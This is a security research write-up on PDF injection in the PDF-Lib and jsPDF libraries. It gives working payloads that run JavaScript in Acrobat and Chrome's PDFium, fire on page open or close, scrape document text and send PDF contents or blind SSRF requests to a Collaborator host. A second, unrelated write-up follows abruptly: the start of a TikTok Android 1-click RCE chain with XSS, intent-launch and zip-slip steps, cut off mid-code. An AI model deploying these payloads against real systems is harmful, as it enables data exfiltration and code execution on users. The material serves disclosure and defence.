Portable Data exFiltration: XSS for PDFs

Portable Data exFiltration: XSS for PDFs

Original text by Gareth Heyes


PDF documents and PDF generators are ubiquitous on the web, and so are injection vulnerabilities. Did you know that controlling a measly HTTP hyperlink can provide a foothold into the inner workings of a PDF? In this paper, you will learn how to use a single link to compromise the contents of a PDF and exfiltrate it to a remote server, just like a blind XSS attack.

I’ll show how you can inject PDF code to escape objects, hijack links, and even execute arbitrary JavaScript — basically XSS within the bounds of a PDF document. I evaluate several popular PDF libraries for injection attacks, as well as the most common readers: Acrobat and Chrome’s PDFium. You’ll learn how to create the «alert(1)» of PDF injection and how to improve it to inject JavaScript that can steal the contents of a PDF on both readers.

I’ll share how I was able to use a custom JavaScript enumerator on the various PDF objects to discover functions that make external requests, enabling me to to exfiltrate data from the PDF. Even PDFs loaded from the filesystem in Acrobat, which have more rigorous protection, can still be made to make external requests. I’ve successfully crafted an injection that can perform an SSRF attack on a PDF rendered server-side. I’ve also managed to read the contents of files from the same domain, even when the Acrobat user agent is blocked by a WAF. Finally, I’ll show you how to steal the contents of a PDF without user interaction, and wrap up with a hybrid PDF that works on both PDFium and Acrobat.

This whitepaper is also available as a printable PDF, and as a «director’s cut» edition of a presentation premiered at Black Hat Europe 2020:


It all started when my colleague, James «albinowax» Kettle, was watching a talk on PDF encryption at BlackHat. He was looking at the slides and thought «This is definitely injectable». When he got back to the office, we had a discussion about PDF injection. At first, I dismissed it as impossible. You wouldn’t know the structure of the PDF and, therefore, wouldn’t be able to inject the correct object references. In theory, you could do this by injecting a whole new xref table, but this won’t work in practice as your new table will simply be ignored… Here at PortSwigger, we don’t stop there; we might initially think an idea is impossible but that won’t stop us from trying.

Before I began testing, I had a couple of research objectives in mind. Given user input into a PDF, could I break it and cause parsing errors? Could I execute JavaScript or exfiltrate the contents of the PDF? I wanted to test two different types of injection: informed and blind. Informed injection refers to cases where I knew the structure of the PDF (for example, because I was able to view the resulting PDF myself). With blind injection, I had no knowledge at all of the PDF’s structure or contents, much like blind XSS.

Injection theory

How can user input get inside PDFs?

Server-side PDF generation is everywhere; it’s in e-tickets, receipts, boarding passes, invoices, pay slips…the list goes on. So there’s plenty of opportunity for user input to get inside a PDF document. The most likely targets for injection are text streams or annotations as these objects allow developers to embed text or a URI, enclosed within parentheses. If a malicious user can inject parentheses, then they can inject PDF code and potentially insert their own harmful PDF objects or actions.

Why try to inject PDF code?

Consider an application where multiple users work on a shared PDF containing sensitive information, such as bank details. If you are able to control part of that PDF via an injection, you could potentially exfiltrate the entire contents of the file when another user accesses it or interacts with it in some way. This works just like a classic XSS attack but within the scope of a PDF document.

Why can’t you inject arbitrary content?

Think about PDF injection just like an XSS injection inside a JavaScript function call. In this case, you would need to ensure that your syntax was valid by closing the parentheses before your injection and repairing the parentheses after your injection. The same principle applies to PDF injection, except you are injecting inside a dictionary value, such as a text stream or annotation URI, rather than a function call.



I have devised the following methodology for PDF injection: Identify, Construct, and Exploit.


First of all, you need to identify whether the PDF generation library is escaping parentheses or backslashes. You can also try to generate these characters by using multi-byte characters that contain 0x5c (backslash) or 0x29 (parenthesis) in the hope the library incorrectly converts them to single-byte characters. Another possible method of generating parentheses or backslashes is to use characters outside the ASCII range. This can cause an overflow if the library incorrectly handles the character. You should then see if you can break the PDF structure by injecting a NULL character, EOF markers, or comments.


Once you’ve established that you can influence the structure of the PDF, you need to construct an injection that confirms you control part of it. This can be done by calling «app.alert(1)» in PDF JavaScript or by using the submitForm action/function to make a POST request to an external URL. This is useful for blind injection scenarios.


Once you’ve confirmed that an injection is possible, you can try to exploit it to exfiltrate the contents of the PDF. Depending on whether you’re injecting the SubmitForm action or using the submitForm JavaScript function, you need to send the correct flags or parameters. I’ll show you how to do this later on in the paper when I cover how to exploit injections.

Vulnerable libraries

I tried around 8 different libraries while conducting this research. Of these, I found two that were vulnerable to PDF injection: PDF-Lib and jsPDF, both of which are npm modules. PDF-Lib has over 52k weekly downloads and jsPDF has over 250k. Each library seems to correctly escape text streams but makes the mistake of allowing PDF injection inside annotations. Here is an example of how you create annotations in PDF-Lib: const linkAnnotation = pdfDoc.context.obj({
  Type: 'Annot',
  Subtype: 'Link',
  Rect: [50, height - 95, 320, height - 130],
  Border: [0, 0, 2],
  C: [0, 0, 1],
  A: {
    Type: 'Action',
    S: 'URI',
    URI: PDFString.of(`/input`),//vulnerable code

As you can see in the code sample, PDF-Lib has a helper function to generate PDF strings, but it doesn’t escape parentheses. So if a developer places user input inside a URI, an attacker can break out and inject their own PDF code. The other library, jsPDF, has the same problem, but this time in the url property of their annotation generation code: var doc = new jsPDF();
doc.text(20, 20, 'Hello world!');
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:'/input'});//vulnerable code

Exploiting injections

Before I demonstrate the vectors I found, I’m going to walk you through the journey I took to find them. First, I’ll talk about how I tried executing JavaScript and stealing the contents of the PDF from an injection. I’ll show you how I solved the problem of tracking and exfiltrating a PDF when opened from the filesystem on Acrobat, as well as how I was able to execute annotations without requiring user interaction. After that I’ll discuss why these injections fail on Chrome and how to make them work. I hope you will enjoy my journey of exploiting injections.


The first step was to test a PDF library, so I downloaded PDFKit, created a bunch of test PDFs, and looked at the generated output. The first thing that stood out was text objects. If you have an injection inside a text stream then you can break out of the text using a closing parenthesis and inject your own PDF code.

A PDF text object looks like the following:

Diagram of a PDF text stream

BT indicates the start of a text object, /F13 sets the font, 12 specifies the size, and Tf is the font resource operator (it’s worth noting that in PDF code, the operators tend to follow their parameters).

The numbers that follow Tf are the starting position on the page; the Td operator specifies the position of the text on the page using those numbers. The opening parenthesis starts the text that’s going to be added to the page, «ABC» is the actual text, then the closing parenthesis finishes the text string. Tj is the show text operator and ET ends the text object.

Controlling the characters inside the parentheses could enable us to break out of the text string and inject PDF code.

I tried all the techniques mentioned in my methodology with PDFKit, PDF Make, and FPDF, and got nowhere. At this point, I parked the research and did something else for a while. I often do this if I reach a dead-end. It’s no good wasting time on research that is going nowhere if nothing works. I find coming back to later with a fresh mind helps a lot. Being persistent is great, but don’t fall into the trap of being repetitive without results.


With a fresh mind, I picked up the research again and decided to study the PDF specification. Just like with XSS, PDF injections can occur in different contexts. So far, I’d only looked at text streams, but sometimes user input might get placed inside links. Annotations stood out to me because they would allow developers to create anchor-like links on PDF text and objects. By now I was on my 4th PDF library. This time, I was using PDFLib. I took some time to use the library to create an annotation and see if I could inject a closing parenthesis into the annotation URI — and it worked! The sample vulnerable code I used to generate the annotation code was:...  
A: {
    Type: 'Action',
    S: 'URI',
    URI: PDFString.of(`injection)`),

Full code:

How did I know the injection was successful? The PDF would render correctly unless I injected a closing parenthesis. This proved that the closing parenthesis was breaking out of the string and causing invalid PDF code. Breaking the PDF was nice, but I needed to ensure I could execute JavaScript of course. I looked at the rendered PDF code and noticed the output was being encoded using the FlateDecode filter. I wrote a little script to deflate the block and the output of the annotation section looked like this:<<
/Type /Annot
/Subtype /Link
/Rect [ 50 746.89 320 711.89 ]
/Border [ 0 0 2 ]
/C [ 0 0 1 ]
/A <<
/Type /Action
/URI (injection))

As you can clearly see, the injection string is closing the text boundary with a closing parenthesis, which leaves an existing closing parenthesis that causes the PDF to be rendered incorrectly:

Screenshot showing an error dialog when loading the PDF

Great, so I could break the rendering of the PDF, now what? I needed to come up with an injection that called some JavaScript — the alert(1) of PDF injection.

Just like how XSS vectors depend on the browser’s parsing, PDF injection exploitability can depend on the PDF renderer. I decided to start by targeting Acrobat because I thought the vectors were less likely to work in Chrome. Two things I noticed: 1) You could inject additional annotation actions and 2) if you repair the existing closing parenthesis then the PDF would render. After some experimentation, I came up with a nice payload that injected an additional annotation action, executed JavaScript, and repaired the closing parenthesis:/blah)>>/A<</S/JavaScript/JS(app.alert(1);)/Type/Action>>/>>(

First I break out of the parenthesis, then break out of the dictionary using >> before starting a new annotation dictionary. The /S/JavaScript makes the annotation JavaScript-based and the /JS is where the JavaScript is stored. Inside the parentheses is our actual JavaScript. Note that you don’t have to escape the parentheses if they’re balanced. Finally, I add the type of annotation, finish the dictionary, and repair the closing parenthesis. This was so cool; I could craft an injection that executed JavaScript but so what, right? You can execute JavaScript but you don’t have access to the DOM, so you can’t read cookies. Then James popped up and suggested stealing the contents of the PDF from the injection. I started looking at ways to get the contents of a PDF. In Acrobat, I discovered that you can use JavaScript to submit forms without any user interaction! Looking at the spec for the JavaScript API, it was pretty straightforward to modify the base injection and add some JavaScript that would send the entire contents of the PDF code to an external server in a POST request:/blah)>>/A<</S/JavaScript/JS(app.alert(1);
cURL: 'https://your-id.burpcollaborator.net',cSubmitAs: 'PDF'}))

The alert is not needed; I just added it to prove the injection was executing JavaScript.

Next, just for fun, I looked at stealing the contents of the PDF without using JavaScript. From the PDF specification, I found out that you can use an action called SubmitForm. I used this in the past when I constructed a PDF for a scan check in Burp Suite. It does exactly what the name implies. It also has a Flags entry in the dictionary to control what is submitted. The Flags dictionary key accepts a single integer value, but each individual setting is controlled by a binary bit. A good way to work with these settings is using the new binary literals in ES6. The binary literal should be 14 bits long because there are 14 flags in total. In the following example, all of the settings are disabled:0b00000000000000

To set a flag, you first need to look up its bit position (table 237 of the PDF specification). In this case, we want to set the SubmitPDF flag. As this is controlled by the 9th bit, you just need to count 9 bits from the right:0b00000100000000

If you evaluate this with JavaScript, this results in the decimal value 256. In other words, setting the Flags entry to 256 will enable the SubmitPDF flag, which causes the contents of the PDF to be sent when submitting the form. All we need to do is use the base injection we created earlier and modify it to call the SubmitForm action instead of JavaScript:/blah)>>/A<</S/SubmitForm/Flags 256/F(


Next I applied my methodology to another PDF library — jsPDF — and found it was vulnerable too. Exploiting this library was quite fun because they have an API that can execute in the browser and will allow you to generate the PDF in real time as you type. I noticed that, like the PDP-Lib library, they forgot to escape parentheses inside annotation URLs. Here the url property was vulnerable:doc.createAnnotation({bounds:

So I generated a PDF using their API and injected PDF code into the url property:var doc = new jsPDF();
doc.text(20, 20, 'Hello world!');
/blah)>>/A<</S/JavaScript/JS(app.alert(1);)/Type/Action/F 0/(

I reduced the vector by removing the type entries of the dictionary and the unneeded F entry. I then left a dangling parenthesis that would be closed by the existing one. Reducing the size of the injection is important because the web application you are injecting to might only allow a limited amount of characters./blah)>>/A<</S/JavaScript/JS(app.alert(1)

I then worked out that it was possible to reduce the vector even further! Acrobat would allow a URI and a JavaScript entry within one annotation action and would happily execute the JavaScript:/)/S/JavaScript/JS(app.alert(1)

Further research revealed that you can also inject multiple annotations. This means that instead of just injecting an action, you could break out of the annotation and define your own rect coordinates to choose which section of the document would be clickable. Using this technique, I was able to make the entire document clickable. /) >> >>
<</Type /Annot /Subtype /Link /Rect [0.00 813.54 566.93 -298.27] /Border [0 0
0] /A <</S/SubmitForm/Flags 0/F(https://your-id.burpcollaborator.net

Writing an enumerator

The next stage was to look at how Acrobat handles PDFs that are loaded from the filesystem, rather than being served directly from a website. In this case, there are more restrictions in place. For example, when you try to submit a form to an external URL, this will now trigger a prompt in which the user has to manually confirm that they want to submit the form. To get around these restrictions I wrote an enumerator/fuzzer to call every function on every object to see if a function would allow me to contact an external server without user interaction.var doc = new jsPDF();
doc.text(20, 20, 'Hello world!');
    for(i in obj){
        try {
            if(i==='console' || i === 'getURL' || i === 'submitForm'){
            if(typeof obj[i] != 'function') {
            try {

Full code

The enumerator first runs a for loop on the global object «this». I skipped the methods getURL, submitForm, and the console object because I knew that they cause prompts and do not allow you to contact external servers unless you click allow. Try-catch blocks are used to prevent the loop from failing if an exception is thrown because the function can’t be called or the property isn’t a valid function. Burp Collaborator is used to see whether the server was contacted successfully — I add the key being checked in the subdomain so that Collaborator will show which property allowed the interaction.

Using this fuzzer, I discovered a method that can be called that contacts an external server: CBSharedReviewIfOfflineDialog will cause a DNS interaction without requiring the user to click allow. You could then use DNS to exfiltrate the contents of the PDF or other information. However, this still requires a click since our injection uses an annotation action.

Executing annotations without interaction

So far, the vectors I’ve demonstrated require a click to activate the action from the annotation. Typically, James asked the question «Can we execute automatically?». I looked through the PDF specification and noticed some interesting features of annotations:

«The PV and PI entries allow a distinction between pages that are open and pages that are visible. At any one time, only a single page is considered open in the viewer application, while more than one page may be visible, depending on the page layout.»

We can add the PV entry to the dictionary and the annotation will fire on Acrobat automatically! Not only that, but we can also execute a payload automatically when the PDF document is closed using the PC entry. An attacker could track you when you open the PDF and close it.

Here’s how to execute automatically from an annotation:var doc = new jsPDF();
>> >>
<</Subtype /Screen /Rect [0 0 900 900] /AA <</PV <</S/JavaScript/JS(app.alert(1))>>/(`});
doc.text(20, 20, 'Auto execute');

When you close the PDF, this annotation will fire:var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>
<</Subtype /Screen /Rect [0 0 900 900] /AA <</PC <</S/JavaScript/JS(app.alert(1))>>/(`});
doc.text(20, 20, 'Close me');


I’ve talked a lot about Acrobat but what about PDFium (Chrome’s PDF reader)? Chrome is tricky; the attack surface is much smaller as its JavaScript support is more limited than Acrobat’s. The first thing I noticed was that JavaScript wasn’t being executed in annotations at all, so my proof of concepts weren’t working. In order to get the vectors working in Chrome, I needed to at least execute JavaScript inside annotations. First though, I decided to try and overwrite a URL in an annotation. This was pretty easy. I could use the base injection I came up with before and simply inject another action with a URI entry that would overwrite the existing URL:var doc = new jsPDF();
/Type/Action>>/F 0>>(`});
doc.text(20, 20, 'Test text');

This would navigate to portswigger.net when clicked. Then I moved on and tried different injections to call JavaScript, but this would fail every time. I thought it was impossible to do. I took a step back and tried to manually construct an entire PDF that would call JavaScript from a click in Chrome without an injection. When using an AcroForm button, Chrome would allow JavaScript execution, but the problem was it required references to parts of the PDF. I managed to craft an injection that would execute JavaScript from a click on JSPDF:var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >> <</BS<</S/B/W 0>>/Type/Annot/MK<</BG[ 0.825 0.8275 0.8275]/CA(Submit)>>/Rect [ 72 697.8898 144 676.2897]/Subtype/Widget/AP<</N <</Type/XObject/BBox[ 0 0 72 21.6]/Subtype/Form>>>>/Parent <</Kids[ 3 0 R]/Ff 65536/FT/Btn/T(test)>>/H/P/A<</S/JavaScript/JS(app.alert(1))/Type/Action/F 4/DA(blah`});
doc.text(20, 20, 'Click me test');

As you can see, the above vector requires knowledge of the PDF structure. [ 3 0 R] refers to a specific PDF object and if we were doing a blind PDF injection attack, we wouldn’t know the structure of it. Still, the next stage is to try a form submission. We can use the submitForm function for this, and because the annotation requires a click, Chrome will allow it:/) >> >> <</BS<</S/B/W 0>>/Type/Annot/MK<</BG[ 0.0 813.54 566.93 -298.27]/CA(Submit)>>/Rect [ 72 697.8898 144 676.2897]/Subtype/Widget/AP<</N <</Type/XObject/BBox[ 0 0 72 21.6]/Subtype/Form>>>>/Parent <</Kids[ 3 0 R]/Ff 65536/FT/Btn/T(test)>>/H/P/A<</S/JavaScript/JS(app.alert(1);this.submitForm('https://your-id.burpcollaborator.net'))/Type/Action/F 4/DA(blah

This works, but it’s messy and requires knowledge of the PDF structure. We can reduce it a lot and remove the reliance on the PDF structure:#) >> >> <</BS<</S/B/W 0>>/Type/Annot/MK<</BG[ 0 0 889 792]/CA(Submit)>>/Rect [ 0 0 889 792]/Subtype/Widget/AP<</N <</Type/XObject/Subtype/Form>>>>/Parent <</Kids[ ]/Ff 65536/FT/Btn/T(test)>>/H/P/A<</S/JavaScript/JS(
    )/Type/Action/F 4/DA(blah

There’s still some code we can remove:var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)>>>><</Type/Annot/Rect[ 0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(A)>>/A<</S/JavaScript/JS(app.alert(1))/(`});
doc.text(20, 20, 'Test text');

The code above breaks out of the annotation, creates a new one, and makes the entire page clickable. In order for the JavaScript to execute, we have to inject a button and give it any text using the «T» entry. We can then finally inject our JavaScript code using the JS entry in the dictionary. Executing JavaScript on Chrome is great. I never thought it would be possible when I started this research.

Next I looked at the submitForm function to steal the contents of the PDF. We know that we can call the function and it does contact an external server, as demonstrated in one of the examples above, but does it support the full Acrobat specification? I looked at the source code of PDFium but the function doesn’t support SubmitAsPDF 🙁 You can see it supports FDF, but unfortunately this doesn’t submit the contents of the PDF. I looked for other ways but I didn’t know what objects were available. I took the same approach I did with Acrobat and wrote a fuzzer/enumerator to find interesting objects. Getting information out of Chrome was more difficult than Acrobat; I had to gather information in chunks before outputting it using the alert function. This was because the alert function truncated the string sent to it....
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)>> <</Type/Annot/Rect[0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(
var obj = this,
    data = '',
    chunks = [],
    counter = 0,
    added = false, i, props = [];
    for(i in obj) {

Full code

Inspecting the output of the enumerator, I tried calling various functions in the hope of making external requests or gathering information from the PDF. Eventually, I found a very interesting function called getPageNthWord, which could extract words from the PDF document, thereby allowing me to steal the contents. The function has a subtle bug where the first word sometimes will not be extracted. But for the most part, it will extract the majority of words:var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)>> <</Type/Annot/Rect[0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(
words = [];
for(page=0;page<this.numPages;page++) {
    for(wordPos=0;wordPos<this.getPageNumWords(page);wordPos++) {
        word = this.getPageNthWord(page, wordPos, true);
doc.text(20, 20, 'Click me test');
doc.text(20, 40, 'Abc Def');
doc.text(20, 60, 'Some word');

I was pretty pleased with myself that I could steal the contents of the PDF on Chrome as I never thought this would be possible. Combining this with the submitForm vector would enable you to send the data to an external server. The only downside is that it requires a click. I wondered if you could get JavaScript execution without a click on Chrome. Looking at the PDF specification again, I noticed that there is another entry in the annotation dictionary called «E», which will execute the annotation when the mouse enters the annotation area — basically a mouseover event. Unfortunately, this does not count as user interaction to enable a form submission. So although you can execute JavaScript, you can’t do anything with the data because you can’t send it to an external server. If you can get Chrome to submit data with this event, please let me know because I’d be very interested to hear how. Anyway, here is the code to trigger a mouseover acton:var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>
<</Type /Annot /Subtype /Widget /Parent<</FT/Btn/T(a)>> /Rect [0 0 900 900] /AA <</E <</S/JavaScript/JS(app.alert(1))>>/(`});
doc.text(20, 20, 'Test');

SSRF in PDFium/Acrobat

It’s possible to send a POST request with PDFium/Acrobat to perform a SSRF attack. This would be a blind SSRF since you can make a POST request but can’t read the response. To construct a POST request, you can use the /parent dictionary key as demonstrated earlier to assign a form element to the annotation, enabling JavaScript execution. But instead of using a button like we did before, you can assign a text field (/Tx) with the parameter name (/T) and parameter value (/V) dictionary keys. Notice how you have to pass the parameter names you want to use to the submitForm function as an array:#)>>>><</Type/Annot/Rect[ 0 0 900 900]/Subtype/Widget/Parent<</FT/Tx/T(foo)/V(bar)>>/A<</S/JavaScript/JS(
this.submitForm('https://aiws4u6uubgfdag94xvc5wbrfilc91.burpcollaborator.net', false, false, ['foo']);

You can even send raw new lines, which could be useful when chaining other attacks such as request smuggling. The result of the POST request can be seen in the following Collaborator request:

Screen shot showing a Burp Collaborator request from a PDF

Finally, I want to finish with a hybrid Chrome and Acrobat PDF injection. The first part injects JavaScript into the existing annotation to execute JavaScript on Acrobat. The second part breaks out of the annotation and injects a new annotation that defines a new clickable area for Chrome. I use the Acroform trick again to inject a button so that the JavaScript will execute: var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)/S/JavaScript/JS(app.alert(1))/Type/Action>> >> <</Type/Annot/Rect[0 0 900 700]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(app.alert(1)`});
doc.text(20, 20, 'Click me Acrobat');
doc.text(20, 60, 'Click me Chrome');

PDF upload «formcalc» technique

While conducting this research, I encountered an HR application that allowed uploading of PDF documents. The PDF wasn’t validated by the application and allowed arbitrary JavaScript to be embedded in the PDF file. I remembered a fantastic technique by @InsertScript that enabled you to make requests from a PDF file to read same origin resources using formcalc.

I tried this attack but it failed because the WAF was blocking requests from the Acrobat user agent. Then I tried cached resources and discovered this would be completely missed by the WAF — it would never see a request because the resource was loaded through the cache. I attempted to use this technique with PDF injection but, unfortunately, I couldn’t figure out a way of injecting formcalc or calling formcalc from JavaScript without using the AcroForm dictionary key in the trailer. If anyone manages to do this then please get in touch because I’d be super interested.


If you are writing a PDF library, it’s recommended that you escape parentheses and backslashes when accepting user input within text streams or annotation URIs. As a developer, you can use the injections mentioned in this paper to confirm that any user input doesn’t cause PDF injection. Consider performing validation on any content going into PDFs to ensure you can’t inject PDF code.


  • Vulnerable libraries can make user input inside PDFs dangerous by not escaping parentheses and backslashes.
  • A clear objective helps when tackling seemingly impossible problems and persistence pays off when trying to achieve those goals.
  • One simple link can compromise the entire contents of an unknown PDF.

Example files

You can download all the injection examples in this whitepaper at:



I knew nothing about the structure of PDFs until I watched a talk about building your own PDF manually by Ange Albertini. He is a great inspiration to me and without his learning materials this post would never have been made. I’d also like to credit Alex «InsertScript» Inführ, who covered PDFs in his mess with the web presentation. It blew everyone’s mind when he demonstrated how much a PDF was able to do. Thank you to both of you. I’d also like to thank Ben Sadeghipour & Cody Brocious for the idea of performing a SSRF attack from a PDF in their excellent presentation.


Adobe has released a patch which addresses the CBSharedReviewIfOfflineDialog information disclosure.

TikTok for Android 1-Click RCE

TikTok for Android 1-Click RCE

Original text by Sayed Abdelhafiz


While testing TikTok for Android Application, I identified multiple bugs that can be chained to achieve Remote code execution that can be triaged through multiple dangerous attack vectors. In this write-up, we will discuss every bug and chain altogether. I worked on it for about 21-day, a long time. The final exploit was simple. The long time I spent in this exploit got me incredible experience and an important trick that helped me a lot in the exploit. TikTok implemented a fix to address the bugs identified, and it was retested to confirm the resolution.


  1. Universal XSS on TikTok WebView
  2. Another XSS on AddWikiActivity
  3. Start Arbitrary Components
  4. Zip Slip in TmaTestActivity
  5. RCE!

Universal XSS on TikTok WebView

TikTok uses a specific WebView that can be invoked by deep-link, Inbox Messages. The WebView handle something called falcon links by grabbing it from the internal files instead of fetching it from their server every time the user uses it to increase the performance.

For performance measuring purposes, after finishing loading the page. The following function will get executed:

this.a.evaluateJavascript("JSON.stringify(window.performance.getEntriesByName(\'" + this.webviewURL + "\'))", v2);

The first idea got on my mind is injecting XSS Payload in the URL to escape the function call and execute my malicious code.

I tried the following link https://m.tiktok.com/falcon/?'),alert(1));//

Unfortunately, It didn’t work. I write a Frida script to hook android.webkit.WebView.evaluateJavascript Method to see what happens?

I found the following string is passed to the method:


The payload is getting encoded because It was in the query string segment. So I decided to put the payload in the fragment segment After #

https://m.tiktok.com/falcon/#'),alert(1));// will fire the following line:


Now, It’s done! We have Universal XSS in that WebView.

Notice: It’s Universal XSS because that javascript code is fired if the link contains something like: m.tiktok.com/falcon/.

For example, https://www.google.com/m.tiktok.com/falcon/ will fire this XSS too.


After find this XSS, I started digging in that WebView to see how It can be harmful.

First, I set up my lab to make it easy for my testing. I have enabled WebViewDebug module to debug the WebView from my dev-tools in google chrome. You find the module here: https://github.com/feix760/WebViewDebugHook

I found that WebView supports the intent scheme. This scheme can make you able to build a customize intent and launch it as an activity. It’s helpful to avoid the export setting of the non-exported activities and maximize the testing scope.

Read the following paper for more information about this intent and how to implents: https://www.mbsd.jp/Whitepaper/IntentScheme.pdf

I tried to execute the following javascript code to open com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity Activity:

location = "intent:#Intent;component=com.zhiliaoapp.musically/com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity;package=com.zhiliaoapp.musically;action=android.intent.action.VIEW;end;"

But I didn’t notice any effect of executing that javascript. I back to the WebViewClient to see what was happening. And the following code came:

boolean v0_7 = v0_6 == null ? true : v0_6.hasClickInTimeInterval();
if((v8.i) && !v0_7) {
v8.i = false;
v4 = true;
else {
v4 = v0_7;

This code restricts the intent scheme to takes effect unless the user has just clicked anywhere. Bad! I don’t prefer 2-click exploits. I saved it in my note and continue my digging trip.

ToutiaoJSBridge, It’s a bridge implemented in the WebView. It has many fruit functions, one of them was openSchema that used to open internal deep-links. There a deep link called aweme://wiki It used to open URLs on AddWikiActivity WebView.

Another XSS on AddWikiActivity

AddWikiActivity Implementing URL validation to make sure that no black URL would be opened in it. But the validation was in http or https schemes only. Because they think that any other scheme is invalid and don’t need to validate:

if(!e.b(arg8)) {
com.bytedance.t.c.e.b.a("AbsSecStrategy", "needBuildSecLink : url is invalid.");
return false;
}public static boolean b(String arg1) {
return !TextUtils.isEmpty(arg1) && ((arg1.startsWith("http")) || (arg1.startsWith("https"))) && !e.a(arg1);

Pretty cool, If the validation is not on the javascript scheme. We can use that scheme to perform XSS attacks on that WebView too!

"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript://m.tiktok.com/%250adocument.write(%22%3Ch1%3EPoC%3C%2Fh1%3E%22)&disable_app_link=false"
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"

<h1>PoC</h1> got printed on the WebView

Start Arbitrary Components

The good news is AddWikiActivity WebView supports the the intent scheme too without any restriction but if disable_app_link parameter was set to false. Easy man!

if the following code got execute in AddWikiActivity The UserFavoritesActivity will get invoked:


Zip Slip in TmaTestActivity

Now, we can open any activity and pass any extras to it. I found an activity called TmaTestActivity in a split package called split_df_miniapp.apk.

Notice: the splits packages don’t attach in the APK. It got downloaded after the first launch of the application by google play core. You can find those package by: adb shell pm path {package_name}

In a nutshell, TmaTestActivity was used to update the SDK by downloading a zip from the internet and extract it.

Uri v5 = Uri.parse(Uri.decode(arg5.toString()));
String v0 = v5.getQueryParameter("action");
if(m.a(v0, "sdkUpdate")) {
m.a(v5, "testUri");
this.updateJssdk(arg4, v5, arg6);

To Invoke the update process we have to set action parameter to sdkUpdate.

private final void updateJssdk(Context arg5, Uri arg6, TmaTestCallback arg7) {
String v0 = arg6.getQueryParameter("sdkUpdateVersion");
String v1 = arg6.getQueryParameter("sdkVersion");
String v6 = arg6.getQueryParameter("latestSDKUrl");
SharedPreferences.Editor v2 = BaseBundleDAO.getJsSdkSP(arg5).edit();
v2.putString("sdk_update_version", v0).apply();
v2.putString("sdk_version", v1).apply();
v2.putString("latest_sdk_url", v6).apply();
DownloadBaseBundleHandler v6_1 = new DownloadBaseBundleHandler();
BundleHandlerParam v0_1 = new BundleHandlerParam();
v6_1.setInitialParam(arg5, v0_1);
ResolveDownloadHandler v5 = new ResolveDownloadHandler();
SetCurrentProcessBundleVersionHandler v6_2 = new SetCurrentProcessBundleVersionHandler();

It collects the SDK updating information from the parameters, then invoke DownloadBaseBundleHandler instance, then set the next handler to ResolveDownloadHandler, then SetCurrentProcessBundleVersionHandler

Let’s start with DownloadBaseBundleHandler. It checks sdkUpdateVersion parameter to see if it was newer than the current one or not. We can set the value to 99.99.99 to avoid this check, then starting the download:

public BundleHandlerParam handle(Context arg14, BundleHandlerParam arg15) {
String v0 = BaseBundleManager.getInst().getSdkCurrentVersionStr(arg14);
String v8 = BaseBundleDAO.getJsSdkSP(arg14).getString("sdk_update_version", "");
if(AppbrandUtil.convertVersionStrToCode(v0) >= AppbrandUtil.convertVersionStrToCode(v8) && (BaseBundleManager.getInst().isRealBaseBundleReadyNow())) {
InnerEventHelper.mpLibResult("mp_lib_validation_result", v0, v8, "no_update", "", -1L);
v10.appendLog("no need update remote basebundle version");
arg15.isIgnoreTask = true;
return arg15;
this.startDownload(v9, v10, arg15, v0, v8);

In startDownload Method, I found that:

v2.a = StorageUtil.getExternalCacheDir(AppbrandContext.getInst().getApplicationContext()).getPath();
v2.b = this.getMd5FromUrl(arg16);

v2.a is the download path. It gets the application context from AppbrandContext and it must have an Instance. Unfortunately, the application didn’t init this instance all time. But I told you that I spent 21-day on this exploit, yeah!? It was enough for me to gain extensive knowledge about the application workflow. And yes! I saw somewhere this instance getting inited.

Invoking the preloadMiniApp function through ToutiaoJSBridge was able to init the instance for me! It was easy for me! Digging on every function on this bridge, even It doesn’t look helpful for me for the first time, but it became useful in this situation ;).

v2.b is the md5sum of the downloading file. It gets from the filename itself:

private String getMd5FromUrl(String arg3) {
return arg3.substring(arg3.lastIndexOf("_") + 1, arg3.lastIndexOf("."));

The filename must look like: anything_{md5sum_of_file}.zip because the md5sum will be compared with the file md5sum after downloading:

public void onDownloadSuccess(ad arg11) {
File v11 = new File(this.val$tmaFileRequest.a, this.val$tmaFileRequest.b);
long v6 = this.val$beginDownloadTime.getMillisAfterStart();
if(!v11.exists()) {
this.val$baseBundleEvent.appendLog("remote basebundle download fail");
this.val$param.isLastTaskSuccess = false;
this.val$baseBundleEvent.appendLog("remote basebundle not exist");
InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "fail", "md5_fail", v6);
else if(this.val$tmaFileRequest.b.equals(CharacterUtils.md5Hex(v11))) {
this.val$baseBundleEvent.appendLog("remote basebundle download success, md5 verify success");
this.val$param.isLastTaskSuccess = true;
this.val$param.targetZipFile = v11;
InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "success", "", v6);
else {
this.val$baseBundleEvent.appendLog("remote basebundle md5 not equals");
InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "fail", "md5_fail", v6);
this.val$param.isLastTaskSuccess = false;

After download processing finished, the file gets passed to ResolveDownloadHandler, to unzip It:

public BundleHandlerParam handle(Context arg13, BundleHandlerParam arg14) {
BaseBundleEvent v0 = arg14.baseBundleEvent;
